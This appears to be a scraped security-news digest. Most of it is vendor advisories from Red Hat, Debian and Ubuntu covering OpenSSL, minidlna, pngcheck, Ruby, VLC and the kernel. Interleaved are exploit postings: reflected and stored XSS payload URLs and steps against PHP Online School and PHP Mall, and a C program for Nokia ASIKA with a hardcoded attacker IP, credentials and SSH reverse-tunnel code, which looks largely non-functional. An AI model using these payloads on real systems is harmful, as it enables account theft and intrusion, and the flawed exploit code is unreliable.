Red Hat Security Advisory 2023-3722-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library. Issues addressed include buffer over-read and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: openssl security and bug fix update  
Advisory ID:       RHSA-2023:3722-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3722  
Issue date:        2023-06-21  
CVE Names:         CVE-2023-0464 CVE-2023-0465 CVE-2023-0466   
                   CVE-2023-1255 CVE-2023-2650   
=====================================================================

1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: Possible DoS translating ASN.1 object identifiers  
(CVE-2023-2650)

* openssl: Denial of service by excessive resource usage in verifying X509  
policy constraints (CVE-2023-0464)

* openssl: Invalid certificate policies in leaf certificates are silently  
ignored (CVE-2023-0465)

* openssl: Certificate policy check not enabled (CVE-2023-0466)

* openssl: Input buffer over-read in AES-XTS implementation on 64 bit ARM  
(CVE-2023-1255)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* In FIPS mode, openssl KDFs should only allow selected hash algorithms  
(BZ#2175860)

* In FIPS mode, openssl should reject short KDF input or output keys or  
provide an indicator (BZ#2175864)

* In FIPS mode, openssl should provide an indicator for AES-GCM to query  
whether the IV was generated internally or provided externally (BZ#2175868)

* openssl FIPS mode self-test should zeroize `out` in `verify_integrity` in  
providers/fips/self_test.c (BZ#2175873)

* In FIPS mode, openssl should not support RSA encryption or decryption  
without padding (outside of RSASVE) or provide an indicator (BZ#2178029)

* In FIPS mode, openssl should reject EVP_PKEY_fromdata() for short DHX  
keys, or provide an indicator (BZ#2178030)

* In FIPS mode, openssl should not use the legacy ECDSA_do_sign(),  
RSA_public_encrypt(), RSA_private_decrypt() functions for pairwise  
consistency tests (BZ#2178034)

* In FIPS mode, openssl should enter error state when DH PCT fails  
(BZ#2178039)

* In FIPS mode, openssl should always run the PBKDF2 lower bounds checks or  
provide an indicator when the pkcs5 parameter is set to 1 (BZ#2178137)

* Support requiring EMS in TLS 1.2, default to it when in FIPS mode  
(BZ#2188046)

* OpenSSL rsa_verify_recover doesn't use the same key checks as rsa_verify  
in FIPS mode (BZ#2188052)

* RHEL9.0 - sshd dumps core when ibmca engine is configured with  
default_algorithms = CIPHERS or ALL (openssl) (BZ#2211396)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2175860 - In FIPS mode, openssl KDFs should only allow selected hash algorithms [rhel-9.2.0.z]  
2175864 - In FIPS mode, openssl should reject short KDF input or output keys or provide an indicator [rhel-9.2.0.z]  
2175868 - In FIPS mode, openssl should provide an indicator for AES-GCM to query whether the IV was generated internally or provided externally [rhel-9.2.0.z]  
2175873 - openssl FIPS mode self-test should zeroize `out` in `verify_integrity` in providers/fips/self_test.c [rhel-9.2.0.z]  
2178029 - In FIPS mode, openssl should not support RSA encryption or decryption without padding (outside of RSASVE) or provide an indicator [rhel-9.2.0.z]  
2178030 - In FIPS mode, openssl should reject EVP_PKEY_fromdata() for short DHX keys, or provide an indicator [rhel-9.2.0.z]  
2178034 - In FIPS mode, openssl should not use the legacy ECDSA_do_sign(), RSA_public_encrypt(), RSA_private_decrypt() functions for pairwise consistency tests [rhel-9.2.0.z]  
2178039 - In FIPS mode, openssl should enter error state when DH PCT fails [rhel-9.2.0.z]  
2178137 - In FIPS mode, openssl should always run the PBKDF2 lower bounds checks or provide an indicator when the pkcs5 parameter is set to 1 [rhel-9.2.0.z]  
2179379 - In FIPS mode, openssl should indicate that RSA encryption and RSASVE are unapproved [rhel-9.2.0.z]  
2181082 - CVE-2023-0464 openssl: Denial of service by excessive resource usage in verifying X509 policy constraints  
2182561 - CVE-2023-0465 openssl: Invalid certificate policies in leaf certificates are silently ignored  
2182565 - CVE-2023-0466 openssl: Certificate policy check not enabled  
2188046 - Support requiring EMS in TLS 1.2, default to it when in FIPS mode [rhel-9.2.0.z]  
2188052 - OpenSSL rsa_verify_recover doesn't use the same key checks as rsa_verify in FIPS mode [rhel-9.2.0.z]  
2188461 - CVE-2023-1255 openssl: Input buffer over-read in AES-XTS implementation on 64 bit ARM  
2207947 - CVE-2023-2650 openssl: Possible DoS translating ASN.1 object identifiers

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
openssl-debuginfo-3.0.7-16.el9_2.aarch64.rpm  
openssl-debugsource-3.0.7-16.el9_2.aarch64.rpm  
openssl-devel-3.0.7-16.el9_2.aarch64.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.aarch64.rpm  
openssl-perl-3.0.7-16.el9_2.aarch64.rpm

ppc64le:  
openssl-debuginfo-3.0.7-16.el9_2.ppc64le.rpm  
openssl-debugsource-3.0.7-16.el9_2.ppc64le.rpm  
openssl-devel-3.0.7-16.el9_2.ppc64le.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.ppc64le.rpm  
openssl-perl-3.0.7-16.el9_2.ppc64le.rpm

s390x:  
openssl-debuginfo-3.0.7-16.el9_2.s390x.rpm  
openssl-debugsource-3.0.7-16.el9_2.s390x.rpm  
openssl-devel-3.0.7-16.el9_2.s390x.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.s390x.rpm  
openssl-perl-3.0.7-16.el9_2.s390x.rpm

x86_64:  
openssl-debuginfo-3.0.7-16.el9_2.i686.rpm  
openssl-debuginfo-3.0.7-16.el9_2.x86_64.rpm  
openssl-debugsource-3.0.7-16.el9_2.i686.rpm  
openssl-debugsource-3.0.7-16.el9_2.x86_64.rpm  
openssl-devel-3.0.7-16.el9_2.i686.rpm  
openssl-devel-3.0.7-16.el9_2.x86_64.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.i686.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.x86_64.rpm  
openssl-perl-3.0.7-16.el9_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
openssl-3.0.7-16.el9_2.src.rpm

aarch64:  
openssl-3.0.7-16.el9_2.aarch64.rpm  
openssl-debuginfo-3.0.7-16.el9_2.aarch64.rpm  
openssl-debugsource-3.0.7-16.el9_2.aarch64.rpm  
openssl-libs-3.0.7-16.el9_2.aarch64.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.aarch64.rpm

ppc64le:  
openssl-3.0.7-16.el9_2.ppc64le.rpm  
openssl-debuginfo-3.0.7-16.el9_2.ppc64le.rpm  
openssl-debugsource-3.0.7-16.el9_2.ppc64le.rpm  
openssl-libs-3.0.7-16.el9_2.ppc64le.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.ppc64le.rpm

s390x:  
openssl-3.0.7-16.el9_2.s390x.rpm  
openssl-debuginfo-3.0.7-16.el9_2.s390x.rpm  
openssl-debugsource-3.0.7-16.el9_2.s390x.rpm  
openssl-libs-3.0.7-16.el9_2.s390x.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.s390x.rpm

x86_64:  
openssl-3.0.7-16.el9_2.x86_64.rpm  
openssl-debuginfo-3.0.7-16.el9_2.i686.rpm  
openssl-debuginfo-3.0.7-16.el9_2.x86_64.rpm  
openssl-debugsource-3.0.7-16.el9_2.i686.rpm  
openssl-debugsource-3.0.7-16.el9_2.x86_64.rpm  
openssl-libs-3.0.7-16.el9_2.i686.rpm  
openssl-libs-3.0.7-16.el9_2.x86_64.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.i686.rpm  
openssl-libs-debuginfo-3.0.7-16.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0464  
https://access.redhat.com/security/cve/CVE-2023-0465  
https://access.redhat.com/security/cve/CVE-2023-0466  
https://access.redhat.com/security/cve/CVE-2023-1255  
https://access.redhat.com/security/cve/CVE-2023-2650  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJNwkNzjgjWX9erEAQhVug/+OCeS8zuNQw9TZbXPIaKw8OzcWeIvViWS  
G8J0Tmb4GmO58XX5BRll9YY49E5Voa2V/Tq5Nq693rdkxb7aiN6zTBk+M2Bc6LKB  
MVnKebjYO9fHU8vrNx9zMxmdXuRe9GKpDbZf12e6k3QxX6q+N8oY7GqdCGJB6I/4  
32JTzwrNTfxiMd54jSgBwuDmi6zg+aPXZ10IkefNQUEOH0zKaE2CBWqp04Okyg7b  
c0ugnOnuUEq5Z/lOjruOx/sfWxij69jSWvPjUqsCVSlb5HZxfMF5Cd2UGMc08wwx  
jh7vU9nTB1+T1E/olP0iRgNvHqiGX+9oIfD2v0HauR9uDGUr3px7JJ/LHH2WTcvv  
Tvl/xH4Kw89ssKw6JEzRJfAQSpbYgAx8+JuXVAvZUUrdBAf07tlqoBBtxPuSbmmO  
4qDjbWZzVfpeuBhm3n1x4xr5WkEnTlikZf6UeOvlZr03HFlTNAx5bQCS2Ma/4jNF  
Sd8LKoC4Xk10TEjL/+9BQ+pJepMXwd941ElNouyFKSu0DV+nG6fyKflBDxCsTFsq  
5b/lrhhHJv2/2VsSzHhe4uQ1BBAF8h/+V37oGVcHEmqI+RTjLOtKF99Mc05ih6bG  
pkdWjV4zF9ZplCMiNCeKzit1ZSSaQrDPHsJ2rnzdl6h93QSbxMNyEoDKKmSxkW+t  
X2F9Dp1A45Q=  
=Uq7W  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3722-01

Debian Linux Security Advisory 5434-1 - A heap-based buffer overflow vulnerability was found in the HTTP chunk parsing code of minidlna, a lightweight DLNA/UPnP-AV server, which may result in denial of service or the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5434-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJune 21, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : minidlnaCVE ID         : CVE-2023-33476Debian Bug     : 1037052A heap-based buffer overflow vulnerability was found in the HTTP chunkparsing code of minidlna, a lightweight DLNA/UPnP-AV server, which mayresult in denial of service or the execution of arbitrary code.For the oldstable distribution (bullseye), this problem has been fixedin version 1.3.0+dfsg-2+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 1.3.0+dfsg-2.2+deb12u1.We recommend that you upgrade your minidlna packages.For the detailed security status of minidlna please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/minidlnaFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSS/7tfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TzDA//ZBIbt2df3MU96n7Aef5oAYAmssjm1OPj1jUn1R3GNzj5fzHjvJWrY7yIUtsWrJd6UpImAuPrNCLL5F0HQ4AWsEVVHac/GpjWgeaHv4NwGXhPBBABujJ46hBAnhenlk6ROqc750G1Lj9cP9UvLOqGvhJzDH/aeCiuJh6nRxU8aRm/Wg2lFFy/3M6TmwgTfZ0VZlIX2raAFZyA4P3a63eVv0iaiEUM7Cu/Fva3N3jmOyqueMziPPPbOPDZ/4kpHv6STdFX1VkMdQ0ZGwW4sRneWUeBIHdO1iVHlQqHtzymC9hZgpNiRG+jxLjFjY5n2cOcF5RLoFILkNeKXyYziUX3syvPEKLH14kxk3hFdhTxx9E140URAaBr7X/m72caxOh5MY4b4CzWnDmxYB8uuAjLSaeKudm1ABq8GFIBYhIxhdjtpO1MgyWoziZ1AOsr8r9NqhmaFSVCZ88ajsn1hK+zv2HKeFoiDQfuFS1Gn0yykunt348eyHIltBYfrnMIB9xQtmzEA3yRakiKzEWfzzwm4pdkEGbckCoOxDmptT5zKX95qX5GnlFaflXN92cY0O5IR9IM2WuPYF0yX7EniCJxTQO+R3Sy/dkU/tNEn4riKql2WIttHd0c7jJNNGi07tm/TAx7X+tkhcp7KBNubyUVvHKctnEKsX/LgM1Jv60/3R8==gHmj-----END PGP SIGNATURE-----

Debian Security Advisory 5434-1

Ubuntu Security Notice 6182-1 - It was discovered that pngcheck incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6182-1June 21, 2023pngcheck vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in pngcheck.Software Description:- pngcheck: Verifies the integrity of PNG, JNG and MNG filesDetails:It was discovered that pngcheck incorrectly handled certain inputs. If auser or an automated system were tricked into opening a specially craftedinput file, a remote attacker could possibly use this issue to cause adenial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   pngcheck                        2.3.0-7ubuntu0.20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):   pngcheck                        2.3.0-7ubuntu0.18.04.1~esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):   pngcheck                        2.3.0-7ubuntu0.16.04.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6182-1   CVE-2020-27818, CVE-2020-35511Package Information:   https://launchpad.net/ubuntu/+source/pngcheck/2.3.0-7ubuntu0.20.04.1

Ubuntu Security Notice USN-6182-1

PHP Online School version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/online-school/                                 ││  Vendor   : NetArt Media                                                               ││  Software : PHP Online School 1.0                                                      ││  Vuln Type: Reflected XSS - Stored XSS                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Reflected XSS                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        ││                                                                                        ││  Stored XSS                                                                            ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://website/users/index.php?category=home&action=welcome&category=home&action=welcome&order=date&order_type=desc&e9m9f"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"fgok8=1## Stored XSSPOST /online-school/users/index.php HTTP/2-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="title"Any Title-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="post_message"-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="message"[XSS Payload]-----------------------------124654322118707720774051212206## Steps to Reproduce:1. Signup & Login in any Normal User Mode2. Go to [My Question] Click [Ask a New Question] on this Path (https://website/users/index.php?category=tickets&action=new)3. Select Any Subject4. Write any Title5. Inject your [XSS Payload] in "Message Box"6. Select Any Priority7. Press Submit8. When ADMIN check Student Questions on this Path (https://website/admin/index.php?category=tickets&action=new)9. XSS Will Fire and Executed on his Browser [-] Done

PHP Online School 1.0 Cross Site Scripting

PHP Mail version 5.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/mall/                                          ││  Vendor   : NetArt Media                                                               ││  Software : PHP Mall 5.0                                                               ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://website/index.php?proceed_search=1&mod=products&lang=en&search_by=&proceed_search=1&mod=products&lang=en&search_by=&num=2&iv3s6"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b6yhe=1[-] Done

PHP Mall 5.0 Cross Site Scripting

The openscap project is a set of open source libraries that support the SCAP (Security Content Automation Protocol) set of standards from NIST. It supports CPE, CCE, CVE, CVSS, OVAL, and XCCDF.

OpenSCAP Libraries 1.3.8

Ubuntu Security Notice 6181-1 - Hiroshi Tokumaru discovered that Ruby did not properly handle certain user input for applications the generate HTTP responses using cgi gem. An attacker could possibly use this issue to maliciously modify the response a user would receive from a vulnerable application. This issue only affected Ubuntu 22.10. It was discovered that Ruby incorrectly handled certain regular expressions. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6181-1  
June 21, 2023

ruby3.1 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10

Summary:

Several security issues were fixed in Ruby.

Software Description:  
- ruby3.1: Interpreter of object-oriented scripting language Ruby

Details:

Hiroshi Tokumaru discovered that Ruby did not properly handle certain  
user input for applications the generate HTTP responses using cgi gem.  
An attacker could possibly use this issue to maliciously modify the  
response a user would receive from a vulnerable application. This issue  
only affected Ubuntu 22.10. (CVE-2021-33621)

It was discovered that Ruby incorrectly handled certain regular expressions.  
An attacker could possibly use this issue to cause a denial of service.  
(CVE-2023-28755, CVE-2023-28756)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libruby3.1                      3.1.2-6ubuntu0.23.04.1  
  ruby3.1                         3.1.2-6ubuntu0.23.04.1

Ubuntu 22.10:  
  libruby3.1                      3.1.2-2ubuntu0.22.10.1  
  ruby3.1                         3.1.2-2ubuntu0.22.10.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6181-1  
  CVE-2021-33621, CVE-2023-28755, CVE-2023-28756

Package Information:  
  https://launchpad.net/ubuntu/+source/ruby3.1/3.1.2-6ubuntu0.23.04.1  
  https://launchpad.net/ubuntu/+source/ruby3.1/3.1.2-2ubuntu0.22.10.1

Ubuntu Security Notice USN-6181-1

Ubuntu Security Notice 6180-1 - It was discovered that VLC could be made to read out of bounds when decoding image files. If a user were tricked into opening a crafted image file, a remote attacker could possibly use this issue to cause VLC to crash, leading to a denial of service. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. It was discovered that VLC could be made to write out of bounds when processing H.264 video files. If a user were tricked into opening a crafted H.264 video file, a remote attacker could possibly use this issue to cause VLC to crash, leading to a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6180-1June 20, 2023vlc vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS (Available with Ubuntu Pro)- Ubuntu 20.04 LTS (Available with Ubuntu Pro)- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in VLC media player.Software Description:- vlc: multimedia player and streamerDetails:It was discovered that VLC could be made to read out of bounds whendecoding image files. If a user were tricked into opening a crafted imagefile, a remote attacker could possibly use this issue to cause VLC tocrash, leading to a denial of service. This issue only affected Ubuntu16.04 LTS and Ubuntu 18.04 LTS. (CVE-2019-19721)It was discovered that VLC could be made to write out of bounds whenprocessing H.264 video files. If a user were tricked into opening acrafted H.264 video file, a remote attacker could possibly use this issueto cause VLC to crash, leading to a denial of service, or possiblyexecute arbitrary code. This issue only affected Ubuntu 18.04 LTS andUbuntu 20.04 LTS. (CVE-2020-13428)It was discovered that VLC could be made to read out of bounds whenprocessing AVI video files. If a user were tricked into opening a craftedAVI video file, a remote attacker could possibly use this issue to causeVLC to crash, leading to a denial of service. This issue only affectedUbuntu 16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu 20.04 LTS. (CVE-2021-25801,CVE-2021-25802, CVE-2021-25803, CVE-2021-25804)It was discovered that the VNC module of VLC contained an arithmeticoverflow. If a user were tricked into opening a crafted playlist orconnecting to a rouge VNC server, a remote attacker could possibly usethis issue to cause VLC to crash, leading to a denial of service, orpossibly execute arbitrary code. (CVE-2022-41325)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   vlc                             3.0.17.4-5ubuntu0.1   vlc-plugin-access-extra         3.0.17.4-5ubuntu0.1Ubuntu 22.04 LTS (Available with Ubuntu Pro):   vlc                             3.0.16-1ubuntu0.1~esm1   vlc-plugin-access-extra         3.0.16-1ubuntu0.1~esm1Ubuntu 20.04 LTS (Available with Ubuntu Pro):   vlc                             3.0.9.2-1ubuntu0.1~esm1   vlc-plugin-access-extra         3.0.9.2-1ubuntu0.1~esm1Ubuntu 18.04 LTS (Available with Ubuntu Pro):   vlc                             3.0.8-0ubuntu18.04.1+esm1   vlc-plugin-access-extra         3.0.8-0ubuntu18.04.1+esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):   vlc                             2.2.2-5ubuntu0.16.04.5+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6180-1   CVE-2019-19721, CVE-2020-13428, CVE-2021-25801, CVE-2021-25802,   CVE-2021-25803, CVE-2021-25804, CVE-2022-41325Package Information:   https://launchpad.net/ubuntu/+source/vlc/3.0.17.4-5ubuntu0.1

Ubuntu Security Notice USN-6180-1

Nokia ASIKA version 7.13.52 suffers from a hard-coded private key disclosure vulnerability.

    // Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure// Date: 2023-06-20// Exploit Author: Amirhossein Bahramizadeh// Category : Hardware// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/// Version: 7.13.52 (REQUIRED)// Tested on: Windows/Linux// CVE : CVE-2023-25187#include <stdio.h>#include <stdlib.h>#include <string.h>#include <errno.h>#include <unistd.h>#include <netinet/in.h>#include <arpa/inet.h>#include <sys/socket.h>#include <sys/types.h>#include <sys/wait.h>#include <signal.h>// The IP address of the vulnerable devicechar *host = "192.168.1.1";// The default SSH port numberint port = 22;// The username and password for the BTS service user accountchar *username = "service_user";char *password = "password123";// The IP address of the attacker's machinechar *attacker_ip = "10.0.0.1";// The port number to use for the MITM attackint attacker_port = 2222;// The maximum length of a message#define MAX_LEN 1024// Forward data between two socketsvoid forward_data(int sock1, int sock2){    char buffer[MAX_LEN];    ssize_t bytes_read;    while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)    {        write(sock2, buffer, bytes_read);    }}int main(){    int sock, pid1, pid2;    struct sockaddr_in addr;    char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};    // Create a new socket    sock = socket(AF_INET, SOCK_STREAM, 0);    // Set the address to connect to    memset(&addr, 0, sizeof(addr));    addr.sin_family = AF_INET;    addr.sin_port = htons(port);    inet_pton(AF_INET, host, &addr.sin_addr);    // Connect to the vulnerable device    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)    {        fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));        exit(1);    }    // Send the SSH handshake    write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);    read(sock, NULL, 0);    // Send the username    write(sock, username, strlen(username));    write(sock, "\r\n", 2);    read(sock, NULL, 0);    // Send the password    write(sock, password, strlen(password));    write(sock, "\r\n", 2);    // Wait for the authentication to complete    sleep(1);    // Start an SSH client on the attacker's machine    pid1 = fork();    if (pid1 == 0)    {        execv("/usr/bin/ssh", argv);        exit(0);    }    // Start an SSH server on the attacker's machine    pid2 = fork();    if (pid2 == 0)    {        execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);        exit(0);    }    // Wait for the SSH server to start    sleep(1);    // Forward data between the client and the server    pid1 = fork();    if (pid1 == 0)    {        forward_data(sock, STDIN_FILENO);        exit(0);    }    pid2 = fork();    if (pid2 == 0)    {        forward_data(STDOUT_FILENO, sock);        exit(0);    }    // Wait for the child processes to finish    waitpid(pid1, NULL, 0);    waitpid(pid2, NULL, 0);    // Close the socket    close(sock);    return 0;}

Nokia ASIKA 7.13.52 Private Key Disclosure

Red Hat Security Advisory 2023-3705-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:3705-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3705  
Issue date:        2023-06-21  
CVE Names:         CVE-2023-2235 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 9) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free vulnerability in the perf_group_detach function of  
the Linux Kernel Performance Events (CVE-2023-2235)

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

